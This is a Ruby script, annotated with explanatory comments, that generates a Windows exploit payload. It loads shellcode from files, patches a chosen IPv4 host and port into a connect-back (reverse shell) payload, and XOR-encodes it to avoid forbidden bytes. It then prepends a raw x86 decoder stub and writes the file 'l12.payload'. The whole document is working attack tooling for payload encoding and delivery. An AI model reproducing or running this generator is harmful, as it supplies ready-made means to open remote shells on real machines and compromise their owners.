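# Writes 'l12.payload': a short decoder stub followed by a payload that has
# been XOR-encoded with a 4-byte key, where the key is chosen so that neither
# the key bytes nor any encoded byte is one of the bytes listed in +forbid+.
#
# Invocation as the script expects it:  ruby <this file> HOST PORT
#
# SECURITY NOTE: `eval File.read(...)` executes the whole file as Ruby code.
# Both input files are therefore a code-execution sink; only point this at
# files you wrote yourself, never at anything received from elsewhere.
# The eval is kept (flagged, not replaced) because the payload files are
# expected to be Ruby expressions that evaluate to the raw payload string.
require 'socket'

x = eval(File.read('winexec.txt')).b
#x = "\x90" * 1000 + "\xcc\xeb\xfe"
#if false
# The assignment below overwrites the one above; the commented-out
# "#if false" / "#end" pair looks like the author's toggle between the two
# payload files and is kept as-is.
# `.b` re-tags the string as binary so that the [offset, length] patches
# below address bytes, not characters (on a UTF-8-tagged string with
# non-ASCII bytes the offsets would no longer be byte offsets).
x = eval(File.read('winconnback.rb')).b

abort "usage: #{$PROGRAM_NAME} HOST PORT" unless ARGV.size == 2
host, port_arg = ARGV
# Integer() raises on non-numeric input instead of silently yielding port 0.
port = Integer(port_arg)
raise ArgumentError, "port out of range: #{port}" unless (0..65_535).cover?(port)

# The payload expects a 4-byte address at offset 283 and a 2-byte big-endian
# port at offset 290, so resolution is restricted to IPv4: a 16-byte IPv6
# address spliced in here would shift every byte after offset 283.
addr = Addrinfo.getaddrinfo(host, nil, Socket::AF_INET).first
abort "#{host} does not resolve to an IPv4 address" unless addr
x[283, 4] = addr.ip_address.split('.').map { |octet| Integer(octet) }.pack('C4')
x[290, 2] = [port].pack('n')
#end
# NOP padding. Because xorbuf processes whole 32-bit words only, up to three
# trailing bytes are dropped at encode time; these bytes absorb that loss.
x << "\x90\x90\x90".b

# Picks the smallest byte value b (0..255) such that b itself is not a
# forbidden byte (the key is embedded in the decoder stub) and no v ^ b for
# v in +val+ is a forbidden byte (that would put a forbidden byte in the
# encoded output).
#
# @param val    [Array<Integer>] plaintext byte values this key byte is XORed with
# @param forbid [String] bytes that must not appear in the key or the output
# @return [Integer, nil] the key byte, or nil when every value is ruled out
def findxorbyte(val, forbid)
  allowed = Array.new(256, true)
  forbid.each_byte do |bad|
    allowed[bad] = false
    val.each { |v| allowed[v ^ bad] = false }
  end
  allowed.index(true)
end

# Chooses a 4-byte XOR key for +buf+. The buffer is viewed as 32-bit words
# and key byte +pos+ is chosen against the bytes at position +pos+ of every
# word, i.e. exactly the bytes xorbuf will XOR it with. Only whole words are
# considered, matching xorbuf's truncation.
#
# @param buf    [String] plaintext payload (binary)
# @param forbid [String] bytes that must not appear in key or output
# @return [String] the 4-byte key as a binary string
# @raise [ArgumentError] when some key position has no usable byte value
def findxorkey(buf, forbid)
  bytes = buf.unpack('C*')
  bytes = bytes.first(bytes.size - bytes.size % 4)
  words = bytes.each_slice(4).to_a
  key_bytes = Array.new(4) do |pos|
    column = words.map { |w| w[pos] }
    b = findxorbyte(column, forbid)
    raise ArgumentError, "no key byte for position #{pos} avoids the forbidden set" unless b
    b
  end
  # Previously this assigned an Integer into a String index, which only
  # worked on Ruby 1.8; pack('C4') builds the same 4-byte string portably.
  key_bytes.pack('C4')
end

# XORs +buf+ word-by-word with the 4-byte +key+, so byte i of every word is
# XORed with key byte i. Only whole 32-bit words are processed: any trailing
# bytes beyond the last full word are dropped from the result.
#
# @param buf [String] plaintext payload (binary)
# @param key [String] 4-byte key
# @return [String] encoded payload (binary), length rounded down to 4
def xorbuf(buf, key)
  k = key.unpack('L').first
  buf.unpack('L*').map { |word| word ^ k }.pack('L*')
end

# Bytes that must not occur anywhere in the stub's key or in the encoded
# payload — presumably bytes the delivery path cannot carry intact.
forbid = "\x0a\x0d\0\x83\x40\x1a".b
k = findxorkey(x, forbid)
x = xorbuf(x, k)

# Raw decoder stub bytes. The four key bytes are patched in at offsets 1..4,
# right after the stub's first opcode byte, so the stub XORs with the same
# 32-bit key xorbuf used. `.b` keeps the concatenation binary-tagged so it
# can be joined with the encoded payload without an encoding error.
xordec = ("\xb8\x0d\xf0\xad" + "\xba\xeb\x0c\x5f" + "\x31\xc9\xb1\xff" +
          "\x31\x07\xaf\xe2" + "\xfb\xeb\x05\xe8" + "\xef\xff\xff\xff").b
xordec[1, 4] = k
# binwrite: a text-mode 'w' would translate newline bytes on some platforms.
File.binwrite('l12.payload', xordec + x)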